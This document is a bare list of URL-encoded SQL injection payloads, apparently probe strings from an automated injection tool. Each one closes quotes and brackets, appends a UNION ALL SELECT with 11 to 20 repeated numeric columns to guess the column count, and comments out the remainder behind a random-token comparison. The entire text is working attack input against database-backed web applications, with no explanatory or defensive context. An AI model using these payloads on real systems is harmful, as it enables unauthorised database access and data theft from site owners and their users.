-5535%27%29%29%20UNION%20ALL%20SELECT%205110%2C%205110%2C%205110%2C%205110%2C%205110%2C%205110%2C%205110%2C%205110%2C%205110%2C%205110%2C%205110%2C%205110%2C%205110%2C%205110%2C%205110%2C%205110%2C%205110%2C%205110--%20%20AND%20%28%28%27xHMZ%27%3D%27xHMZ -4782%27%29%29%20UNION%20ALL%20SELECT%207960%2C%207960%2C%207960%2C%207960%2C%207960%2C%207960%2C%207960%2C%207960%2C%207960%2C%207960%2C%207960%2C%207960%2C%207960%2C%207960%2C%207960%2C%207960%2C%207960%2C%207960%2C%207960--%20%20AND%20%28%28%27FWwE%27%3D%27FWwE -9983%27%29%29%20UNION%20ALL%20SELECT%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710--%20%20AND%20%28%28%27wcJD%27%3D%27wcJD -5100%27%29%29%29%20UNION%20ALL%20SELECT%203199%2C%203199%2C%203199%2C%203199%2C%203199%2C%203199%2C%203199%2C%203199%2C%203199%2C%203199%2C%203199--%20%20AND%20%28%28%28%27wJQZ%27%3D%27wJQZ -5981%27%29%29%29%20UNION%20ALL%20SELECT%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746--%20%20AND%20%28%28%28%27nfpB%27%3D%27nfpB -3101%27%29%29%29%20UNION%20ALL%20SELECT%208364%2C%208364%2C%208364%2C%208364%2C%208364%2C%208364%2C%208364%2C%208364%2C%208364%2C%208364%2C%208364%2C%208364%2C%208364--%20%20AND%20%28%28%28%27IqhZ%27%3D%27IqhZ -2893%27%29%29%29%20UNION%20ALL%20SELECT%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547--%20%20AND%20%28%28%28%27OLiU%27%3D%27OLiU -4585%27%29%29%29%20UNION%20ALL%20SELECT%208190%2C%208190%2C%208190%2C%208190%2C%208190%2C%208190%2C%208190%2C%208190%2C%208190%2C%208190%2C%208190%2C%208190%2C%208190%2C%208190%2C%208190--%20%20AND%20%28%28%28%27YuqV%27%3D%27YuqV -8661%27%29%29%29%20UNION%20ALL%20SELECT%203079%2C%203079%2C%203079%2C%203079%2C%203079%2C%203079%2C%203079%2C%203079%2C%203079%2C%203079%2C%203079%2C%203079%2C%203079%2C%203079%2C%203079%2C%203079--%20%20AND%20%28%28%28%27RiUm%27%3D%27RiUm -3848%27%29%29%29%20UNION%20ALL%20SELECT%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016--%20%20AND%20%28%28%28%27SKBh%27%3D%27SKBh -2185%27%29%29%29%20UNION%20ALL%20SELECT%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740--%20%20AND%20%28%28%28%27cnGH%27%3D%27cnGH -3567%27%29%29%29%20UNION%20ALL%20SELECT%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687--%20%20AND%20%28%28%28%27qsXG%27%3D%27qsXG -7998%27%29%29%29%20UNION%20ALL%20SELECT%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411--%20%20AND%20%28%28%28%27Toiz%27%3D%27Toiz -2498%27%20UNION%20ALL%20SELECT%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786--%20%20AND%20%27dnUO%27%3D%27dnUO -4560%27%20UNION%20ALL%20SELECT%208736%2C%208736%2C%208736%2C%208736%2C%208736%2C%208736%2C%208736%2C%208736%2C%208736%2C%208736%2C%208736%2C%208736--%20%20AND%20%27njLW%27%3D%27njLW -4338%27%20UNION%20ALL%20SELECT%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576%2C%202576--%20%20AND%20%27zfZT%27%3D%27zfZT -4596%27%20UNION%20ALL%20SELECT%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410--%20%20AND%20%27uupr%27%3D%27uupr -4345%27%20UNION%20ALL%20SELECT%204579%2C%204579%2C%204579%2C%204579%2C%204579%2C%204579%2C%204579%2C%204579%2C%204579%2C%204579%2C%204579%2C%204579%2C%204579%2C%204579%2C%204579--%20%20AND%20%27bPma%27%3D%27bPma -1930%27%20UNION%20ALL%20SELECT%205018%2C%205018%2C%205018%2C%205018%2C%205018%2C%205018%2C%205018%2C%205018%2C%205018%2C%205018%2C%205018%2C%205018%2C%205018%2C%205018%2C%205018%2C%205018--%20%20AND%20%27DjjU%27%3D%27DjjU -9371%27%20UNION%20ALL%20SELECT%209899%2C%209899%2C%209899%2C%209899%2C%209899%2C%209899%2C%209899%2C%209899%2C%209899%2C%209899%2C%209899%2C%209899%2C%209899%2C%209899%2C%209899%2C%209899%2C%209899--%20%20AND%20%27LXdu%27%3D%27LXdu -5118%27%20UNION%20ALL%20SELECT%208753%2C%208753%2C%208753%2C%208753%2C%208753%2C%208753%2C%208753%2C%208753%2C%208753%2C%208753%2C%208753%2C%208753%2C%208753%2C%208753%2C%208753%2C%208753%2C%208753%2C%208753--%20%20AND%20%27Zljh%27%3D%27Zljh -5228%27%20UNION%20ALL%20SELECT%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346--%20%20AND%20%27NDTo%27%3D%27NDTo -6675%27%20UNION%20ALL%20SELECT%207705%2C%207705%2C%207705%2C%207705%2C%207705%2C%207705%2C%207705%2C%207705%2C%207705%2C%207705%2C%207705%2C%207705%2C%207705%2C%207705%2C%207705%2C%207705%2C%207705%2C%207705%2C%207705%2C%207705--%20%20AND%20%27zJVQ%27%3D%27zJVQ -6581%27%29%20UNION%20ALL%20SELECT%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417--%20%20AND%20%28%27ysBe%27%20LIKE%20%27ysBe -3218%27%29%20UNION%20ALL%20SELECT%202000%2C%202000%2C%202000%2C%202000%2C%202000%2C%202000%2C%202000%2C%202000%2C%202000%2C%202000%2C%202000%2C%202000--%20%20AND%20%28%27Qygk%27%20LIKE%20%27Qygk -2146%27%29%20UNION%20ALL%20SELECT%208063%2C%208063%2C%208063%2C%208063%2C%208063%2C%208063%2C%208063%2C%208063%2C%208063%2C%208063%2C%208063%2C%208063%2C%208063--%20%20AND%20%28%27vHNz%27%20LIKE%20%27vHNz -1445%27%29%20UNION%20ALL%20SELECT%202557%2C%202557%2C%202557%2C%202557%2C%202557%2C%202557%2C%202557%2C%202557%2C%202557%2C%202557%2C%202557%2C%202557%2C%202557%2C%202557--%20%20AND%20%28%27ZSMg%27%20LIKE%20%27ZSMg -8135%27%29%20UNION%20ALL%20SELECT%205779%2C%205779%2C%205779%2C%205779%2C%205779%2C%205779%2C%205779%2C%205779%2C%205779%2C%205779%2C%205779%2C%205779%2C%205779%2C%205779%2C%205779--%20%20AND%20%28%27bUKQ%27%20LIKE%20%27bUKQ -6204%27%29%20UNION%20ALL%20SELECT%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828--%20%20AND%20%28%27hhlJ%27%20LIKE%20%27hhlJ -6026%27%29%20UNION%20ALL%20SELECT%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087--%20%20AND%20%28%27unSi%27%20LIKE%20%27unSi -8584%27%29%20UNION%20ALL%20SELECT%203407%2C%203407%2C%203407%2C%203407%2C%203407%2C%203407%2C%203407%2C%203407%2C%203407%2C%203407%2C%203407%2C%203407%2C%203407%2C%203407%2C%203407%2C%203407%2C%203407%2C%203407--%20%20AND%20%28%27rAmF%27%20LIKE%20%27rAmF -9806%27%29%20UNION%20ALL%20SELECT%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907--%20%20AND%20%28%27HSZx%27%20LIKE%20%27HSZx -9594%27%29%20UNION%20ALL%20SELECT%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048--%20%20AND%20%28%27BIuh%27%20LIKE%20%27BIuh -4068%27%29%29%20UNION%20ALL%20SELECT%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105--%20%20AND%20%28%28%27XMXl%27%20LIKE%20%27XMXl -9579%27%29%29%20UNION%20ALL%20SELECT%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634--%20%20AND%20%28%28%27xzDD%27%20LIKE%20%27xzDD -7204%27%29%29%20UNION%20ALL%20SELECT%202554%2C%202554%2C%202554%2C%202554%2C%202554%2C%202554%2C%202554%2C%202554%2C%202554%2C%202554%2C%202554%2C%202554%2C%202554--%20%20AND%20%28%28%27KHjD%27%20LIKE%20%27KHjD -8958%27%29%29%20UNION%20ALL%20SELECT%202536%2C%202536%2C%202536%2C%202536%2C%202536%2C%202536%2C%202536%2C%202536%2C%202536%2C%202536%2C%202536%2C%202536%2C%202536%2C%202536--%20%20AND%20%28%28%27ysfd%27%20LIKE%20%27ysfd -2826%27%29%29%20UNION%20ALL%20SELECT%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754--%20%20AND%20%28%28%27GMnq%27%20LIKE%20%27GMnq -4946%27%29%29%20UNION%20ALL%20SELECT%208320%2C%208320%2C%208320%2C%208320%2C%208320%2C%208320%2C%208320%2C%208320%2C%208320%2C%208320%2C%208320%2C%208320%2C%208320%2C%208320%2C%208320%2C%208320--%20%20AND%20%28%28%27lFfu%27%20LIKE%20%27lFfu -5419%27%29%29%20UNION%20ALL%20SELECT%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465--%20%20AND%20%28%28%27JwlR%27%20LIKE%20%27JwlR -9797%27%29%29%20UNION%20ALL%20SELECT%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099--%20%20AND%20%28%28%27vFKV%27%20LIKE%20%27vFKV -6628%27%29%29%20UNION%20ALL%20SELECT%208845%2C%208845%2C%208845%2C%208845%2C%208845%2C%208845%2C%208845%2C%208845%2C%208845%2C%208845%2C%208845%2C%208845%2C%208845%2C%208845%2C%208845%2C%208845%2C%208845%2C%208845%2C%208845--%20%20AND%20%28%28%27Lgxo%27%20LIKE%20%27Lgxo -6632%27%29%29%20UNION%20ALL%20SELECT%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527%2C%206527--%20%20AND%20%28%28%27hVoY%27%20LIKE%20%27hVoY -7635%27%29%29%29%20UNION%20ALL%20SELECT%202063%2C%202063%2C%202063%2C%202063%2C%202063%2C%202063%2C%202063%2C%202063%2C%202063%2C%202063%2C%202063--%20%20AND%20%28%28%28%27wtla%27%20LIKE%20%27wtla -4623%27%29%29%29%20UNION%20ALL%20SELECT%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998--%20%20AND%20%28%28%28%27Yade%27%20LIKE%20%27Yade -3608%27%29%29%29%20UNION%20ALL%20SELECT%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225--%20%20AND%20%28%28%28%27PGtA%27%20LIKE%20%27PGtA -1244%27%29%29%29%20UNION%20ALL%20SELECT%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021--%20%20AND%20%28%28%28%27bler%27%20LIKE%20%27bler -1670%27%29%29%29%20UNION%20ALL%20SELECT%203910%2C%203910%2C%203910%2C%203910%2C%203910%2C%203910%2C%203910%2C%203910%2C%203910%2C%203910%2C%203910%2C%203910%2C%203910%2C%203910%2C%203910--%20%20AND%20%28%28%28%27dllb%27%20LIKE%20%27dllb -1447%27%29%29%29%20UNION%20ALL%20SELECT%207792%2C%207792%2C%207792%2C%207792%2C%207792%2C%207792%2C%207792%2C%207792%2C%207792%2C%207792%2C%207792%2C%207792%2C%207792%2C%207792%2C%207792%2C%207792--%20%20AND%20%28%28%28%27lFwd%27%20LIKE%20%27lFwd -1118%27%29%29%29%20UNION%20ALL%20SELECT%203719%2C%203719%2C%203719%2C%203719%2C%203719%2C%203719%2C%203719%2C%203719%2C%203719%2C%203719%2C%203719%2C%203719%2C%203719%2C%203719%2C%203719%2C%203719%2C%203719--%20%20AND%20%28%28%28%27IHTy%27%20LIKE%20%27IHTy -4595%27%29%29%29%20UNION%20ALL%20SELECT%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639%2C%205639--%20%20AND%20%28%28%28%27AuFF%27%20LIKE%20%27AuFF -4134%27%29%29%29%20UNION%20ALL%20SELECT%202667%2C%202667%2C%202667%2C%202667%2C%202667%2C%202667%2C%202667%2C%202667%2C%202667%2C%202667%2C%202667%2C%202667%2C%202667%2C%202667%2C%202667%2C%202667%2C%202667%2C%202667%2C%202667--%20%20AND%20%28%28%28%27BonK%27%20LIKE%20%27BonK -9460%27%29%29%29%20UNION%20ALL%20SELECT%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795--%20%20AND%20%28%28%28%27fkgF%27%20LIKE%20%27fkgF -1974%27%20UNION%20ALL%20SELECT%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843--%20%20AND%20%27QIml%27%20LIKE%20%27QIml -8598%27%20UNION%20ALL%20SELECT%208668%2C%208668%2C%208668%2C%208668%2C%208668%2C%208668%2C%208668%2C%208668%2C%208668%2C%208668%2C%208668%2C%208668--%20%20AND%20%27dDYq%27%20LIKE%20%27dDYq -3667%27%20UNION%20ALL%20SELECT%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072--%20%20AND%20%27ZCeu%27%20LIKE%20%27ZCeu -2971%27%20UNION%20ALL%20SELECT%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563--%20%20AND%20%27rODO%27%20LIKE%20%27rODO -6642%27%20UNION%20ALL%20SELECT%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999%2C%201999--%20%20AND%20%27kvPw%27%20LIKE%20%27kvPw -5642%27%20UNION%20ALL%20SELECT%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869--%20%20AND%20%27pEwy%27%20LIKE%20%27pEwy -4692%27%20UNION%20ALL%20SELECT%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592%2C%202592--%20%20AND%20%27aFuy%27%20LIKE%20%27aFuy -9512%27%20UNION%20ALL%20SELECT%208235%2C%208235%2C%208235%2C%208235%2C%208235%2C%208235%2C%208235%2C%208235%2C%208235%2C%208235%2C%208235%2C%208235%2C%208235%2C%208235%2C%208235%2C%208235%2C%208235%2C%208235--%20%20AND%20%27PuoJ%27%20LIKE%20%27PuoJ -9767%27%20UNION%20ALL%20SELECT%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374--%20%20AND%20%27urnP%27%20LIKE%20%27urnP -3912%27%20UNION%20ALL%20SELECT%207402%2C%207402%2C%207402%2C%207402%2C%207402%2C%207402%2C%207402%2C%207402%2C%207402%2C%207402%2C%207402%2C%207402%2C%207402%2C%207402%2C%207402%2C%207402%2C%207402%2C%207402%2C%207402%2C%207402--%20%20AND%20%27idjF%27%20LIKE%20%27idjF -7624%22%29%20UNION%20ALL%20SELECT%209623%2C%209623%2C%209623%2C%209623%2C%209623%2C%209623%2C%209623%2C%209623%2C%209623%2C%209623%2C%209623--%20%20AND%20%28%22pflp%22%3D%22pflp -7790%22%29%20UNION%20ALL%20SELECT%206238%2C%206238%2C%206238%2C%206238%2C%206238%2C%206238%2C%206238%2C%206238%2C%206238%2C%206238%2C%206238%2C%206238--%20%20AND%20%28%22Qdvp%22%3D%22Qdvp -3675%22%29%20UNION%20ALL%20SELECT%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611--%20%20AND%20%28%22lOsT%22%3D%22lOsT -9384%22%29%20UNION%20ALL%20SELECT%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906--%20%20AND%20%28%22TTNs%22%3D%22TTNs -9516%22%29%20UNION%20ALL%20SELECT%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825--%20%20AND%20%28%22llBs%22%3D%22llBs -3242%22%29%20UNION%20ALL%20SELECT%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218--%20%20AND%20%28%22yTZq%22%3D%22yTZq -8649%22%29%20UNION%20ALL%20SELECT%208599%2C%208599%2C%208599%2C%208599%2C%208599%2C%208599%2C%208599%2C%208599%2C%208599%2C%208599%2C%208599%2C%208599%2C%208599%2C%208599%2C%208599%2C%208599%2C%208599--%20%20AND%20%28%22GErs%22%3D%22GErs -5538%22%29%20UNION%20ALL%20SELECT%206121%2C%206121%2C%206121%2C%206121%2C%206121%2C%206121%2C%206121%2C%206121%2C%206121%2C%206121%2C%206121%2C%206121%2C%206121%2C%206121%2C%206121%2C%206121%2C%206121%2C%206121--%20%20AND%20%28%22wfnu%22%3D%22wfnu -3661%22%29%20UNION%20ALL%20SELECT%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541--%20%20AND%20%28%22NHMb%22%3D%22NHMb -1903%22%29%20UNION%20ALL%20SELECT%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711%2C%201711--%20%20AND%20%28%22igZY%22%3D%22igZY -5436%22%29%29%20UNION%20ALL%20SELECT%209578%2C%209578%2C%209578%2C%209578%2C%209578%2C%209578%2C%209578%2C%209578%2C%209578%2C%209578%2C%209578--%20%20AND%20%28%28%22cdGO%22%3D%22cdGO -8577%22%29%29%20UNION%20ALL%20SELECT%209379%2C%209379%2C%209379%2C%209379%2C%209379%2C%209379%2C%209379%2C%209379%2C%209379%2C%209379%2C%209379%2C%209379--%20%20AND%20%28%28%22pnqb%22%3D%22pnqb -3861%22%29%29%20UNION%20ALL%20SELECT%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251--%20%20AND%20%28%28%22DgJm%22%3D%22DgJm -8650%22%29%29%20UNION%20ALL%20SELECT%208310%2C%208310%2C%208310%2C%208310%2C%208310%2C%208310%2C%208310%2C%208310%2C%208310%2C%208310%2C%208310%2C%208310%2C%208310%2C%208310--%20%20AND%20%28%28%22kCfR%22%3D%22kCfR -1132%22%29%29%20UNION%20ALL%20SELECT%203544%2C%203544%2C%203544%2C%203544%2C%203544%2C%203544%2C%203544%2C%203544%2C%203544%2C%203544%2C%203544%2C%203544%2C%203544%2C%203544%2C%203544--%20%20AND%20%28%28%22iibJ%22%3D%22iibJ -3750%22%29%29%20UNION%20ALL%20SELECT%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618--%20%20AND%20%28%28%22nlqc%22%3D%22nlqc -6354%22%29%29%20UNION%20ALL%20SELECT%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972--%20%20AND%20%28%28%22pnFH%22%3D%22pnFH -9640%22%29%29%20UNION%20ALL%20SELECT%205735%2C%205735%2C%205735%2C%205735%2C%205735%2C%205735%2C%205735%2C%205735%2C%205735%2C%205735%2C%205735%2C%205735%2C%205735%2C%205735%2C%205735%2C%205735%2C%205735%2C%205735--%20%20AND%20%28%28%22jYRc%22%3D%22jYRc -5507%22%29%29%20UNION%20ALL%20SELECT%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467--%20%20AND%20%28%28%22vSKK%22%3D%22vSKK -1701%22%29%29%20UNION%20ALL%20SELECT%202650%2C%202650%2C%202650%2C%202650%2C%202650%2C%202650%2C%202650%2C%202650%2C%202650%2C%202650%2C%202650%2C%202650%2C%202650%2C%202650%2C%202650%2C%202650%2C%202650%2C%202650%2C%202650%2C%202650--%20%20AND%20%28%28%22lEGO%22%3D%22lEGO -8707%22%29%29%29%20UNION%20ALL%20SELECT%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256--%20%20AND%20%28%28%28%22AcHM%22%3D%22AcHM -9398%22%29%29%29%20UNION%20ALL%20SELECT%201956%2C%201956%2C%201956%2C%201956%2C%201956%2C%201956%2C%201956%2C%201956%2C%201956%2C%201956%2C%201956%2C%201956--%20%20AND%20%28%28%28%22CYIC%22%3D%22CYIC -2667%22%29%29%29%20UNION%20ALL%20SELECT%205479%2C%205479%2C%205479%2C%205479%2C%205479%2C%205479%2C%205479%2C%205479%2C%205479%2C%205479%2C%205479%2C%205479%2C%205479--%20%20AND%20%28%28%28%22uJCC%22%3D%22uJCC -9552%22%29%29%29%20UNION%20ALL%20SELECT%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684--%20%20AND%20%28%28%28%22YJHk%22%3D%22YJHk -9884%22%29%29%29%20UNION%20ALL%20SELECT%201981%2C%201981%2C%201981%2C%201981%2C%201981%2C%201981%2C%201981%2C%201981%2C%201981%2C%201981%2C%201981%2C%201981%2C%201981%2C%201981%2C%201981--%20%20AND%20%28%28%28%22slbn%22%3D%22slbn -2206%22%29%29%29%20UNION%20ALL%20SELECT%201296%2C%201296%2C%201296%2C%201296%2C%201296%2C%201296%2C%201296%2C%201296%2C%201296%2C%201296%2C%201296%2C%201296%2C%201296%2C%201296%2C%201296%2C%201296--%20%20AND%20%28%28%28%22HADH%22%3D%22HADH -4248%22%29%29%29%20UNION%20ALL%20SELECT%201273%2C%201273%2C%201273%2C%201273%2C%201273%2C%201273%2C%201273%2C%201273%2C%201273%2C%201273%2C%201273%2C%201273%2C%201273%2C%201273%2C%201273%2C%201273%2C%201273--%20%20AND%20%28%28%28%22luOX%22%3D%22luOX -7245%22%29%29%29%20UNION%20ALL%20SELECT%201372%2C%201372%2C%201372%2C%201372%2C%201372%2C%201372%2C%201372%2C%201372%2C%201372%2C%201372%2C%201372%2C%201372%2C%201372%2C%201372%2C%201372%2C%201372%2C%201372%2C%201372--%20%20AND%20%28%28%28%22hEOZ%22%3D%22hEOZ -4845%22%29%29%29%20UNION%20ALL%20SELECT%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733%2C%209733--%20%20AND%20%28%28%28%22Zcwg%22%3D%22Zcwg -4736%22%29%29%29%20UNION%20ALL%20SELECT%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936--%20%20AND%20%28%28%28%22xwEm%22%3D%22xwEm -7191%22%20UNION%20ALL%20SELECT%204192%2C%204192%2C%204192%2C%204192%2C%204192%2C%204192%2C%204192%2C%204192%2C%204192%2C%204192%2C%204192--%20%20AND%20%22esMp%22%3D%22esMp -1442%22%20UNION%20ALL%20SELECT%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094--%20%20AND%20%22nLHi%22%3D%22nLHi -5046%22%20UNION%20ALL%20SELECT%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695--%20%20AND%20%22kYvO%22%3D%22kYvO -1143%22%20UNION%20ALL%20SELECT%203184%2C%203184%2C%203184%2C%203184%2C%203184%2C%203184%2C%203184%2C%203184%2C%203184%2C%203184%2C%203184%2C%203184%2C%203184%2C%203184--%20%20AND%20%22Pzid%22%3D%22Pzid -4730%22%20UNION%20ALL%20SELECT%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531--%20%20AND%20%22FuoO%22%3D%22FuoO -1751%22%20UNION%20ALL%20SELECT%201416%2C%201416%2C%201416%2C%201416%2C%201416%2C%201416%2C%201416%2C%201416%2C%201416%2C%201416%2C%201416%2C%201416%2C%201416%2C%201416%2C%201416%2C%201416--%20%20AND%20%22wHyM%22%3D%22wHyM -8349%22%20UNION%20ALL%20SELECT%201618%2C%201618%2C%201618%2C%201618%2C%201618%2C%201618%2C%201618%2C%201618%2C%201618%2C%201618%2C%201618%2C%201618%2C%201618%2C%201618%2C%201618%2C%201618%2C%201618--%20%20AND%20%22LNMi%22%3D%22LNMi -1308%22%20UNION%20ALL%20SELECT%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855%2C%208855--%20%20AND%20%22GjQo%22%3D%22GjQo -7650%22%20UNION%20ALL%20SELECT%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675--%20%20AND%20%22atbF%22%3D%22atbF -8274%22%20UNION%20ALL%20SELECT%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099--%20%20AND%20%22xYJU%22%3D%22xYJU 